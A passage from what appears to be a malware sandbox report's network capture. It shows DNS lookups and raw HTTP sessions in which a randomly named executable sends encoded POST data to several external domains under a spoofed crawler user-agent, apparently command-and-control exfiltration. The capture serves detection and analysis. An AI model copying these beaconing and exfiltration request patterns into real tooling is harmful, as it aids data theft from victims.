                                                Jan 11, 2025 06:56:27.288276911 CET5001880192.168.2.4209.74.79.41
                                                Jan 11, 2025 06:56:27.293060064 CET8050018209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:27.861274004 CET8050018209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:27.861443043 CET8050018209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:27.861751080 CET5001880192.168.2.4209.74.79.41
                                                Jan 11, 2025 06:56:28.796533108 CET5001880192.168.2.4209.74.79.41
                                                Jan 11, 2025 06:56:29.815419912 CET5001980192.168.2.4209.74.79.41
                                                Jan 11, 2025 06:56:29.820652962 CET8050019209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:29.820787907 CET5001980192.168.2.4209.74.79.41
                                                Jan 11, 2025 06:56:29.836471081 CET5001980192.168.2.4209.74.79.41
                                                Jan 11, 2025 06:56:29.841295004 CET8050019209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:29.841305971 CET8050019209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:29.841820955 CET8050019209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:29.841830015 CET8050019209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:29.841836929 CET8050019209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:29.841845036 CET8050019209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:29.841849089 CET8050019209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:29.841851950 CET8050019209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:29.841856003 CET8050019209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:30.418767929 CET8050019209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:30.418782949 CET8050019209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:30.418867111 CET5001980192.168.2.4209.74.79.41
                                                Jan 11, 2025 06:56:31.343358994 CET5001980192.168.2.4209.74.79.41
                                                Jan 11, 2025 06:56:32.361959934 CET5002080192.168.2.4209.74.79.41
                                                Jan 11, 2025 06:56:32.366871119 CET8050020209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:32.366964102 CET5002080192.168.2.4209.74.79.41
                                                Jan 11, 2025 06:56:32.376277924 CET5002080192.168.2.4209.74.79.41
                                                Jan 11, 2025 06:56:32.381134033 CET8050020209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:32.948417902 CET8050020209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:32.949805975 CET8050020209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:32.949886084 CET5002080192.168.2.4209.74.79.41
                                                Jan 11, 2025 06:56:32.951567888 CET5002080192.168.2.4209.74.79.41
                                                Jan 11, 2025 06:56:32.957118034 CET8050020209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:37.999272108 CET5002180192.168.2.446.38.243.234
                                                Jan 11, 2025 06:56:38.004153013 CET805002146.38.243.234192.168.2.4
                                                Jan 11, 2025 06:56:38.004252911 CET5002180192.168.2.446.38.243.234
                                                Jan 11, 2025 06:56:38.024276018 CET5002180192.168.2.446.38.243.234
                                                Jan 11, 2025 06:56:38.029083014 CET805002146.38.243.234192.168.2.4
                                                Jan 11, 2025 06:56:39.530934095 CET5002180192.168.2.446.38.243.234
                                                Jan 11, 2025 06:56:39.579201937 CET805002146.38.243.234192.168.2.4
                                                Jan 11, 2025 06:56:40.550791979 CET5002280192.168.2.446.38.243.234
                                                Jan 11, 2025 06:56:40.555730104 CET805002246.38.243.234192.168.2.4
                                                Jan 11, 2025 06:56:40.555916071 CET5002280192.168.2.446.38.243.234
                                                Jan 11, 2025 06:56:40.571866989 CET5002280192.168.2.446.38.243.234
                                                Jan 11, 2025 06:56:40.576801062 CET805002246.38.243.234192.168.2.4
                                                Jan 11, 2025 06:56:41.485034943 CET805002146.38.243.234192.168.2.4
                                                Jan 11, 2025 06:56:41.485100031 CET5002180192.168.2.446.38.243.234
                                                Jan 11, 2025 06:56:42.077713013 CET5002280192.168.2.446.38.243.234
                                                Jan 11, 2025 06:56:42.082772017 CET805002246.38.243.234192.168.2.4
                                                Jan 11, 2025 06:56:42.082854033 CET5002280192.168.2.446.38.243.234
                                                Jan 11, 2025 06:56:43.096959114 CET5002380192.168.2.446.38.243.234
                                                Jan 11, 2025 06:56:43.101768970 CET805002346.38.243.234192.168.2.4
                                                Jan 11, 2025 06:56:43.101892948 CET5002380192.168.2.446.38.243.234
                                                Jan 11, 2025 06:56:43.116882086 CET5002380192.168.2.446.38.243.234
                                                Jan 11, 2025 06:56:43.121840000 CET805002346.38.243.234192.168.2.4
                                                Jan 11, 2025 06:56:43.121861935 CET805002346.38.243.234192.168.2.4
                                                Jan 11, 2025 06:56:43.121876955 CET805002346.38.243.234192.168.2.4
                                                Jan 11, 2025 06:56:43.121889114 CET805002346.38.243.234192.168.2.4
                                                Jan 11, 2025 06:56:43.121912956 CET805002346.38.243.234192.168.2.4
                                                Jan 11, 2025 06:56:43.121927977 CET805002346.38.243.234192.168.2.4
                                                Jan 11, 2025 06:56:43.122011900 CET805002346.38.243.234192.168.2.4
                                                Jan 11, 2025 06:56:43.122025967 CET805002346.38.243.234192.168.2.4
                                                Jan 11, 2025 06:56:43.122075081 CET805002346.38.243.234192.168.2.4
                                                Jan 11, 2025 06:56:44.624617100 CET5002380192.168.2.446.38.243.234
                                                Jan 11, 2025 06:56:44.675328970 CET805002346.38.243.234192.168.2.4
                                                Jan 11, 2025 06:56:45.643762112 CET5002480192.168.2.446.38.243.234
                                                Jan 11, 2025 06:56:45.648871899 CET805002446.38.243.234192.168.2.4
                                                Jan 11, 2025 06:56:45.648987055 CET5002480192.168.2.446.38.243.234
                                                Jan 11, 2025 06:56:45.658754110 CET5002480192.168.2.446.38.243.234
                                                Jan 11, 2025 06:56:45.663589001 CET805002446.38.243.234192.168.2.4
                                                Jan 11, 2025 06:57:04.476636887 CET805002346.38.243.234192.168.2.4
                                                Jan 11, 2025 06:57:04.477436066 CET5002380192.168.2.446.38.243.234

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 11, 2025 06:55:26.621014118 CET6371853192.168.2.41.1.1.1
                                                Jan 11, 2025 06:55:26.637794018 CET53637181.1.1.1192.168.2.4
                                                Jan 11, 2025 06:55:43.315629005 CET5935553192.168.2.41.1.1.1
                                                Jan 11, 2025 06:55:43.332221031 CET53593551.1.1.1192.168.2.4
                                                Jan 11, 2025 06:55:57.597429991 CET6008453192.168.2.41.1.1.1
                                                Jan 11, 2025 06:55:57.660417080 CET53600841.1.1.1192.168.2.4
                                                Jan 11, 2025 06:56:11.144773960 CET5425453192.168.2.41.1.1.1
                                                Jan 11, 2025 06:56:11.359388113 CET53542541.1.1.1192.168.2.4
                                                Jan 11, 2025 06:56:24.690603971 CET5462253192.168.2.41.1.1.1
                                                Jan 11, 2025 06:56:24.710666895 CET53546221.1.1.1192.168.2.4
                                                Jan 11, 2025 06:56:37.956295013 CET6268553192.168.2.41.1.1.1
                                                Jan 11, 2025 06:56:37.995342970 CET53626851.1.1.1192.168.2.4

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jan 11, 2025 06:55:26.621014118 CET192.168.2.41.1.1.10x5334Standard query (0)www.aoivej.infoA (IP address)IN (0x0001)false
                                                Jan 11, 2025 06:55:43.315629005 CET192.168.2.41.1.1.10x4da7Standard query (0)www.givvjn.infoA (IP address)IN (0x0001)false
                                                Jan 11, 2025 06:55:57.597429991 CET192.168.2.41.1.1.10x9ccdStandard query (0)www.gern.devA (IP address)IN (0x0001)false
                                                Jan 11, 2025 06:56:11.144773960 CET192.168.2.41.1.1.10xdbedStandard query (0)www.newbh.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 06:56:24.690603971 CET192.168.2.41.1.1.10x6327Standard query (0)www.thinkone.xyzA (IP address)IN (0x0001)false
                                                Jan 11, 2025 06:56:37.956295013 CET192.168.2.41.1.1.10x48e1Standard query (0)www.mraber.devA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jan 11, 2025 06:55:26.637794018 CET1.1.1.1192.168.2.40x5334No error (0)www.aoivej.info47.83.1.90A (IP address)IN (0x0001)false
                                                Jan 11, 2025 06:55:43.332221031 CET1.1.1.1192.168.2.40x4da7No error (0)www.givvjn.info47.83.1.90A (IP address)IN (0x0001)false
                                                Jan 11, 2025 06:55:57.660417080 CET1.1.1.1192.168.2.40x9ccdNo error (0)www.gern.dev185.151.30.223A (IP address)IN (0x0001)false
                                                Jan 11, 2025 06:56:11.359388113 CET1.1.1.1192.168.2.40xdbedNo error (0)www.newbh.pro176.57.65.76A (IP address)IN (0x0001)false
                                                Jan 11, 2025 06:56:24.710666895 CET1.1.1.1192.168.2.40x6327No error (0)www.thinkone.xyz209.74.79.41A (IP address)IN (0x0001)false
                                                Jan 11, 2025 06:56:37.995342970 CET1.1.1.1192.168.2.40x48e1No error (0)www.mraber.devmraber.devCNAME (Canonical name)IN (0x0001)false
                                                Jan 11, 2025 06:56:37.995342970 CET1.1.1.1192.168.2.40x48e1No error (0)mraber.dev46.38.243.234A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • www.aoivej.info
                                                • www.givvjn.info
                                                • www.gern.dev
                                                • www.newbh.pro
                                                • www.thinkone.xyz
                                                • www.mraber.dev

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.44973647.83.1.90805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:55:26.670206070 CET414OUTGET /ou8k/?TXVlY=nv6XU20pgPTDN0&94=sHhXhPPev91RFxpjPhHA/72AjtyYVyN8Fxcd9dT6JE90JPwt9aU6w+ea6SVS8TAmTGQcFcEZTyl6CSjd+TmOm9tiQhux0BP2yYLzMg1QsJkzQ4A7X5eN3dM= HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Host: www.aoivej.info
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Jan 11, 2025 06:55:28.273789883 CET139INHTTP/1.1 567 unknown
                                                Server: nginx/1.18.0
                                                Date: Sat, 11 Jan 2025 05:55:28 GMT
                                                Content-Length: 17
                                                Connection: close
                                                Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                Data Ascii: Request too large


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.44978947.83.1.90805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:55:43.356867075 CET667OUTPOST /wl3x/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.givvjn.info
                                                Origin: http://www.givvjn.info
                                                Referer: http://www.givvjn.info/wl3x/
                                                Content-Length: 199
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 46 42 76 66 76 45 6f 4d 74 59 61 4b 6f 66 39 4c 69 42 69 6d 6f 47 78 51 35 76 54 6b 46 74 51 5a 50 53 51 6e 67 74 74 4d 65 51 68 72 4d 4d 66 6c 50 58 67 79 6d 50 69 52 44 6c 52 70 47 75 35 68 52 2b 48 41 38 64 76 71 33 55 32 54 5a 6f 45 76 75 32 61 4b 2b 72 31 50 79 34 55 4e 7a 64 41 70 4b 71 6d 76 4a 73 41 55 4d 76 42 6f 61 70 34 77 75 72 59 58 4b 53 7a 69 74 59 79 73 48 73 4c 45 77 52 36 41 64 51 73 6b 50 31 4c 65 6f 50 67 67 34 47 31 77 49 64 69 47 63 6a 7a 4f 36 49 78 6e 4e 4e 36 64 42 41 73 7a 34 31 61 6b 39 6f 75 6e 4d 77 42 36 4b 57 34 31 31 30 35 78 46 68 50 62 6e 41 3d 3d
                                                Data Ascii: 94=FBvfvEoMtYaKof9LiBimoGxQ5vTkFtQZPSQngttMeQhrMMflPXgymPiRDlRpGu5hR+HA8dvq3U2TZoEvu2aK+r1Py4UNzdApKqmvJsAUMvBoap4wurYXKSzitYysHsLEwR6AdQskP1LeoPgg4G1wIdiGcjzO6IxnNN6dBAsz41ak9ounMwB6KW41105xFhPbnA==


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.44980547.83.1.90805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:55:45.902787924 CET687OUTPOST /wl3x/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.givvjn.info
                                                Origin: http://www.givvjn.info
                                                Referer: http://www.givvjn.info/wl3x/
                                                Content-Length: 219
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 46 42 76 66 76 45 6f 4d 74 59 61 4b 70 37 35 4c 6b 6e 71 6d 67 47 78 54 33 50 54 6b 63 64 51 56 50 53 63 6e 67 70 31 63 64 69 31 72 4a 65 58 6c 4f 57 67 79 6c 50 69 52 4a 46 52 73 62 2b 35 71 52 2b 4c 69 38 66 72 71 33 56 53 54 5a 6f 55 76 75 46 79 4a 76 72 31 4a 37 59 55 31 73 4e 41 70 4b 71 6d 76 4a 73 6b 2b 4d 75 70 6f 61 5a 49 77 76 4b 59 57 4a 53 7a 68 6c 34 79 73 4e 4d 4b 44 77 52 36 69 64 53 49 65 50 32 7a 65 6f 4f 51 67 34 55 4e 76 43 64 69 49 53 44 79 64 70 61 51 58 4e 63 7a 56 43 6d 73 36 38 55 65 55 78 4f 6a 39 64 42 67 74 59 57 63 47 6f 7a 77 46 49 69 79 53 38 4c 41 49 65 69 6d 4b 57 4d 42 62 58 4e 47 4e 72 78 35 54 2b 63 77 3d
                                                Data Ascii: 94=FBvfvEoMtYaKp75LknqmgGxT3PTkcdQVPScngp1cdi1rJeXlOWgylPiRJFRsb+5qR+Li8frq3VSTZoUvuFyJvr1J7YU1sNApKqmvJsk+MupoaZIwvKYWJSzhl4ysNMKDwR6idSIeP2zeoOQg4UNvCdiISDydpaQXNczVCms68UeUxOj9dBgtYWcGozwFIiyS8LAIeimKWMBbXNGNrx5T+cw=


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.44982547.83.1.90805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:55:48.444037914 CET10769OUTPOST /wl3x/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.givvjn.info
                                                Origin: http://www.givvjn.info
                                                Referer: http://www.givvjn.info/wl3x/
                                                Content-Length: 10299
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 46 42 76 66 76 45 6f 4d 74 59 61 4b 70 37 35 4c 6b 6e 71 6d 67 47 78 54 33 50 54 6b 63 64 51 56 50 53 63 6e 67 70 31 63 64 69 74 72 4a 4c 62 6c 50 31 59 79 6b 50 69 52 46 6c 52 74 62 2b 35 33 52 39 37 6d 38 66 6e 55 33 57 36 54 5a 4c 73 76 6f 30 79 4a 32 37 31 4a 6b 49 55 4f 7a 64 42 7a 4b 71 32 72 4a 73 30 2b 4d 75 70 6f 61 62 67 77 35 72 59 57 45 79 7a 69 74 59 7a 74 48 73 4b 6e 77 52 6a 56 64 53 4d 4f 54 58 54 65 78 75 41 67 30 42 5a 76 66 4e 69 4b 56 44 7a 61 70 61 63 49 4e 59 62 7a 43 6d 77 44 38 55 71 55 69 34 4c 6a 59 41 4d 78 4f 48 70 65 6f 77 49 64 4e 67 69 53 79 4b 39 30 50 54 75 65 4a 4e 74 53 4d 71 37 76 7a 79 6c 44 6c 70 76 52 42 56 76 4f 30 49 64 6a 57 32 57 6b 50 49 7a 49 4b 4b 6d 44 4d 42 4c 51 4f 59 43 32 58 75 72 62 48 76 74 67 47 75 54 33 67 41 58 66 32 61 53 71 49 74 54 6c 51 36 4c 65 44 34 64 49 61 68 58 35 74 43 76 4a 4e 41 65 72 6e 39 6b 53 74 5a 2f 64 42 64 57 69 79 31 36 50 75 41 44 44 62 75 31 37 50 31 68 77 35 35 71 5a 38 77 4b 35 66 4c 67 2f 37 5a 4e 6d 33 53 6e [TRUNCATED]
                                                Data Ascii: 94=FBvfvEoMtYaKp75LknqmgGxT3PTkcdQVPScngp1cditrJLblP1YykPiRFlRtb+53R97m8fnU3W6TZLsvo0yJ271JkIUOzdBzKq2rJs0+Mupoabgw5rYWEyzitYztHsKnwRjVdSMOTXTexuAg0BZvfNiKVDzapacINYbzCmwD8UqUi4LjYAMxOHpeowIdNgiSyK90PTueJNtSMq7vzylDlpvRBVvO0IdjW2WkPIzIKKmDMBLQOYC2XurbHvtgGuT3gAXf2aSqItTlQ6LeD4dIahX5tCvJNAern9kStZ/dBdWiy16PuADDbu17P1hw55qZ8wK5fLg/7ZNm3SnEcF/zojCD7cLo4qYzIJTDB75RP2i4cy4ZTknjKgiqnL0aPpnq1/hDf1aGiPVEXXdefck7MGQDft4cyAFM9sRrCwpN47gtbtyvkvv40/YO87e+86jK1z0WD7RqzUw12xCbOrHnFaWwk8FhWWjVgCcFUln5O5BhkWXicN52k70j4ueV50ve1Dq9U9OPEyVaQeP0uf67oIo5fgFQNrLgGP44SW+oejWgg1OGnSCi7h+r3DxXJp1tCQoOAYy6T5ZbwiUcApkzi1dRZU+4V9wdLpvYk+FR5ZsS2PO2oUVrOdhYHwS4v0vf2tKRmD31utjoO7Msd2weG4wVGwF+N6fqM+bp1B8INT9y1jhzgS6Y4LSAvXDc30vPpB2BqJqlVJ3FTf4XseqeBR2PFM3OicKkiafg9trrAfhiXbv+iZukfayfot0pMDKsmuUBaXMvJV5QYSjKXyeJ1PbrVx5BGD+m3u0fKvMJYKk0kKAdkLZ+CYVi4AARSgCoJR7HLsGNTBki86K11OmNjSkeS4AfNHk5DJP8HGLGVsJ/3QRwksfXfGQ9XvPTz/3Zn9WHMdsbaXnf7hHQ9r6hL/5Ni9FL0z4LQEBQDbHZ9ooVCuBEsMBALem3UtKzV/I6XP9OaoX87MqZbsSBwGQgr2INdsr5JGhhEOO8Ci4TEyEkcJ2o4 [TRUNCATED]


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.44984247.83.1.90805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:55:50.992594957 CET414OUTGET /wl3x/?94=IDH/sxYsqLulkbcslybjsGNv3NS6VvVpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeI9ZMZ+p0PiMQUF+eqUdc9aZVsWrUptbZMNnY=&TXVlY=nv6XU20pgPTDN0 HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Host: www.givvjn.info
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Jan 11, 2025 06:55:52.580343008 CET139INHTTP/1.1 567 unknown
                                                Server: nginx/1.18.0
                                                Date: Sat, 11 Jan 2025 05:55:52 GMT
                                                Content-Length: 17
                                                Connection: close
                                                Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                Data Ascii: Request too large


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.449882185.151.30.223805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:55:57.683901072 CET658OUTPOST /xbnt/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.gern.dev
                                                Origin: http://www.gern.dev
                                                Referer: http://www.gern.dev/xbnt/
                                                Content-Length: 199
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 6d 6f 67 76 4b 43 5a 62 75 4f 56 5a 6a 73 66 61 67 4b 57 32 62 78 63 57 45 44 79 72 45 51 5a 36 4d 30 75 4a 70 77 34 67 7a 73 70 49 74 56 54 30 30 33 55 53 47 49 64 45 6b 43 41 75 47 6b 69 4a 68 65 54 35 2f 4b 6c 45 66 64 53 70 44 7a 4c 5a 32 36 4c 6a 66 78 74 38 35 78 56 6e 51 49 30 57 59 6b 4c 6c 4c 77 34 50 69 51 43 44 5a 46 78 6f 6c 58 75 44 71 57 65 63 39 4d 70 32 70 58 47 4e 69 4a 69 2f 67 61 55 6f 6c 4c 49 39 43 49 33 30 38 36 57 41 4e 77 36 64 5a 45 39 52 73 5a 4d 73 41 6e 6d 44 43 54 42 6f 6a 36 78 4a 30 43 68 47 73 48 78 50 48 33 72 73 32 34 46 59 35 45 6b 72 46 41 3d 3d
                                                Data Ascii: 94=mogvKCZbuOVZjsfagKW2bxcWEDyrEQZ6M0uJpw4gzspItVT003USGIdEkCAuGkiJheT5/KlEfdSpDzLZ26Ljfxt85xVnQI0WYkLlLw4PiQCDZFxolXuDqWec9Mp2pXGNiJi/gaUolLI9CI3086WANw6dZE9RsZMsAnmDCTBoj6xJ0ChGsHxPH3rs24FY5EkrFA==
                                                Jan 11, 2025 06:55:58.437335014 CET212INHTTP/1.1 403
                                                content-length: 93
                                                cache-control: no-cache
                                                content-type: text/html
                                                x-via: ASH1
                                                connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.449899185.151.30.223805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:56:00.226214886 CET678OUTPOST /xbnt/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.gern.dev
                                                Origin: http://www.gern.dev
                                                Referer: http://www.gern.dev/xbnt/
                                                Content-Length: 219
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 6d 6f 67 76 4b 43 5a 62 75 4f 56 5a 6a 4d 50 61 6d 74 36 32 4b 42 63 56 4b 6a 79 72 57 51 59 53 4d 30 71 4a 70 78 4e 39 30 65 39 49 73 77 33 30 31 32 55 53 48 49 64 45 38 53 41 68 5a 30 69 41 68 65 66 62 2f 50 4e 45 66 64 47 70 44 79 37 5a 32 4e 6e 67 65 68 74 2b 6e 52 56 6c 55 49 30 57 59 6b 4c 6c 4c 78 64 59 69 51 4b 44 5a 31 42 6f 33 6c 47 41 30 47 65 66 38 4d 70 32 2b 6e 48 45 69 4a 69 52 67 59 67 47 6c 4a 77 39 43 4a 48 30 38 76 71 44 59 41 36 62 45 55 38 66 72 71 35 30 5a 58 6e 63 49 77 68 4d 70 5a 64 77 34 6b 73 63 39 32 51 59 56 33 50 66 72 2f 4d 73 30 48 5a 69 65 42 2b 74 46 79 77 2b 52 4f 2b 61 57 52 6a 79 44 79 54 41 49 53 77 3d
                                                Data Ascii: 94=mogvKCZbuOVZjMPamt62KBcVKjyrWQYSM0qJpxN90e9Isw3012USHIdE8SAhZ0iAhefb/PNEfdGpDy7Z2Nngeht+nRVlUI0WYkLlLxdYiQKDZ1Bo3lGA0Gef8Mp2+nHEiJiRgYgGlJw9CJH08vqDYA6bEU8frq50ZXncIwhMpZdw4ksc92QYV3Pfr/Ms0HZieB+tFyw+RO+aWRjyDyTAISw=
                                                Jan 11, 2025 06:56:00.988415956 CET212INHTTP/1.1 403
                                                content-length: 93
                                                cache-control: no-cache
                                                content-type: text/html
                                                x-via: ASH1
                                                connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.449915185.151.30.223805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:56:02.783718109 CET10760OUTPOST /xbnt/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.gern.dev
                                                Origin: http://www.gern.dev
                                                Referer: http://www.gern.dev/xbnt/
                                                Content-Length: 10299
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 6d 6f 67 76 4b 43 5a 62 75 4f 56 5a 6a 4d 50 61 6d 74 36 32 4b 42 63 56 4b 6a 79 72 57 51 59 53 4d 30 71 4a 70 78 4e 39 30 65 46 49 73 47 72 30 30 52 34 53 45 49 64 45 69 43 41 31 5a 30 6a 43 68 65 58 66 2f 50 42 2b 66 65 2b 70 5a 51 44 5a 30 34 54 67 48 78 74 2b 76 78 56 6d 51 49 31 55 59 6b 62 68 4c 77 74 59 69 51 4b 44 5a 32 5a 6f 6e 6e 75 41 7a 32 65 63 39 4d 70 71 70 58 48 6f 69 4a 71 6e 67 59 6b 34 6b 34 51 39 43 70 58 30 36 64 43 44 45 51 36 5a 48 55 39 43 72 71 6c 56 5a 58 72 51 49 78 46 79 70 61 42 77 34 6c 4d 4b 36 44 77 59 41 68 58 43 72 34 52 48 38 47 6c 61 64 43 2b 4a 49 54 34 4a 47 39 57 57 57 52 6e 2b 63 78 37 65 55 32 32 44 32 43 6d 58 6f 64 39 6c 78 68 2f 38 31 72 4a 49 63 55 32 34 69 31 47 34 52 54 6d 56 4d 59 74 4b 7a 6e 31 4b 4c 64 37 76 4a 44 4e 79 2f 4e 75 49 7a 4e 64 55 77 74 4b 73 4a 55 72 77 50 71 79 73 54 71 64 78 34 55 4f 4f 77 52 41 49 4e 65 73 33 54 57 4d 30 70 4f 6d 35 45 5a 66 57 41 36 57 2b 56 68 4d 57 55 34 51 37 66 62 57 4b 2b 76 49 5a 4e 6f 32 58 51 7a 46 [TRUNCATED]
